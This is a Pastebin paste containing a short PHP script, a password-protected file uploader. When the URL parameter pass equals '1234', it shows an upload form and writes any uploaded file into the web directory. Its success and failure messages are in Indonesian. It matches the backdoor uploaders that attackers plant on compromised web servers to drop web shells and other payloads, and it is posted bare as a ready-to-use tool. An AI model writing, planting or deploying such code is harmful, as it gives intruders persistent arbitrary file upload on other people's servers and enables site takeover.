nil_007

.

Dec 30th, 2018
406
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. <?php $pass = '1234'; if(!empty($_GET['pass']) && $_GET['pass'] == urldecode(trim($pass))){ ?><?php
  2. if($_POST){
  3. if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  4. echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
  5. }else{
  6. echo"<b>gagal";
  7. }
  8. }
  9. else{
  10. echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up> <br>";
  11. }
  12.  
  13. ?><?php } ?>
Add Comment
Please, Sign In to add comment